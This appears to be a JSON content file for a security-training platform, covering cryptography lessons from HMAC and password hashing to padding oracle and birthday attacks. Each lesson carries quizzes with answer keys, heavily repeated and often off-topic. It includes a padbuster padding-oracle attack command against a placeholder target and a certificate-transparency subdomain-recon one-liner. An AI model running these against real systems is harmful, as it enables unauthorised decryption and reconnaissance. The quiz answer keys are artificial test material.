Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"hmac-crypto","cat":"Cryptography","title":"HMAC","diff":1,"xp":75,"intro":"The right way to do MAC with hash functions.","sections":[{"type":"text","content":"HMAC(k,m) = H(k^opad || H(k^ipad || m)). Immune to length extension."},{"type":"code","lang":"python","content":"import hmac, hashlib\nsig = hmac.new(key, msg, hashlib.sha256).hexdigest()"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Why hmac.compare_digest over ==?","opts":["Faster","Prevents timing attacks","Handles encoding","More readable"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"bcrypt-scrypt-argon2","cat":"Cryptography","title":"Password Hashing","diff":1,"xp":100,"intro":"Intentionally slow hashing for passwords.","sections":[{"type":"text","content":"bcrypt (work factor), scrypt (memory-hard), Argon2 (tunable memory/time/parallelism)."},{"type":"code","lang":"python","content":"import bcrypt\nhashed = bcrypt.hashpw(b'secret', bcrypt.gensalt(rounds=12))"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Why are password hashes intentionally slow?","opts":["Save CPU","Make brute force impractical","Compress hash","Add entropy"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"padding-oracle-attack","cat":"Cryptography","title":"Padding Oracle Attack","diff":3,"xp":300,"intro":"Server reveals valid padding = decrypt any CBC ciphertext.","sections":[{"type":"text","content":"If a server reveals whether CBC padding is valid, iterate to decrypt the entire message."},{"type":"code","lang":"bash","content":"padbuster http://target/decrypt.php <cookie> 8 -encoding 0"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Vulnerable cipher mode?","opts":["ECB","CBC","GCM","CTR"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"tls-handshake","cat":"Cryptography","title":"TLS Handshake","diff":2,"xp":150,"intro":"What happens in the first 200ms of every HTTPS connection.","sections":[{"type":"text","content":"TLS 1.3: ClientHello, ServerHello, certificate, key share, Finished."},{"type":"code","lang":"bash","content":"openssl s_client -connect example.com:443 -msg"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"TLS handshake exchanges?","opts":["Passwords","Key shares and certificates","HTTP headers","DB credentials"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"certificate-transparency","cat":"Cryptography","title":"Certificate Transparency","diff":1,"xp":75,"intro":"Public logs of every SSL cert. Gold mine for recon.","sections":[{"type":"text","content":"CAs must log every cert to public, append-only logs. Search for subdomains."},{"type":"code","lang":"bash","content":"curl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq -r '.[].name_value' | sort -u"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"CT's security purpose?","opts":["Encrypting certs","Detecting rogue certificates","Revoking certs","Speeding TLS"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pki-chain","cat":"Cryptography","title":"PKI Chain of Trust","diff":2,"xp":150,"intro":"How browsers decide to trust a certificate.","sections":[{"type":"text","content":"Root CAs sign Intermediate CAs, which sign end-entity certs. Browser validates the chain."},{"type":"code","lang":"bash","content":"openssl s_client -connect example.com:443 -showcerts 2>/dev/null | grep 'subject|issuer'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Top of the certificate chain?","opts":["Website","Intermediate CA","Root CA","Browser"],"ans":2},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pgp-gpg","cat":"Cryptography","title":"PGP/GPG Encryption","diff":1,"xp":75,"intro":"End-to-end encryption for email and files.","sections":[{"type":"text","content":"Hybrid: symmetric session key encrypts data, recipient's public key encrypts session key."},{"type":"code","lang":"bash","content":"gpg --full-generate-key\ngpg --encrypt --recipient 'Name' secret.txt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"PGP encryption model?","opts":["Symmetric only","Asymmetric only","Hybrid","No encryption"],"ans":2},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"birthday-attack","cat":"Cryptography","title":"Birthday Attack","diff":2,"xp":150,"intro":"Finding collisions is easier than you think: sqrt(2^n) tries.","sections":[{"type":"text","content":"For n-bit hash, ~2^(n/2) attempts for a collision. MD5 (2^64), SHA-256 (2^128)."},{"type":"code","lang":"python","content":"# Find collision on truncated hash\nseen = {}\nfor i in range(100000):\n    h = short_hash(random_string())\n    if h in seen: print('Collision!'); break\n    seen[h] = True"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Attempts for 128-bit hash collision?","opts":["2^128","2^64","2^32","2^16"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions 